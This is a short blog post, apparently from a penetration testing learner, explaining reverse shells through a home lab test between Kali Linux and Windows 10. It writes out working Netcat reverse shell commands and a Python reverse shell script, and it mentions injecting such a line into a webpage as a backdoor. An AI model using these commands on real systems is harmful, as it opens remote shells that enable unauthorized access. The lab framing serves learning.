Netcat is a very popular tool for Network Administrators because it allows them to manage machines(pc and servers) remotely but unfortunately it is also a favorite tool of hackers and to prove this, with just 1 line of command that can be injected on a webpage would create a backdoor(see my previous post "Mr Robot 1 from Vulhub Part 5" how I used it to gain entry to the system using Netcat Reverse Shell).
Reverse shell is one of the important things to know when you are aspiring to become a Penetration Tester. Reverse shell is a technique wherein a hacker's goal is to connect to a remote computer and redirect the input and output connections of the target system’s shell so the attacker can access it remotely.
I did an experiment using my Kali Linux on virtual box and my host Windows 10 OS(operating system) to check if it can be done with other scenarios, I have succeeded in code injection so far. The first thing I did was to install Netcat and I did a little research and it comes with the installation of Nmap for Windows, so I downloaded Nmap, install it and go to the directory where it was installed and in CMD, I typed "ncat -nvlp 768" and I got the following result:
What I just did was I set my Windows 10 OS to listen or intercept any data coming from port 768.
The next step I did is to open my Kali Linux and type the following at the terminal(by the way, Netcat is already pre installed in Kali): "nc -nv 192.168.254.181 768 -e /bin/bash".
The following is the result in Kali:
and on my Windows 10 OS:
This means that a connection was established. To check if the connection is working, I typed "ls" from my Windows 10 OS and got the following result:
An alternative to Netcat is a python program. Check out the code below:
1 2 3 4 5 6 7 8 9 10 | import socket import subprocess import os s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("0.0.0.0", 7777)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) p = subprocess.call(["/bin/sh", "-i"]) |
Hackers sometimes in order to evade detection, they need to seek alternatives by automating the process.
No comments:
Post a Comment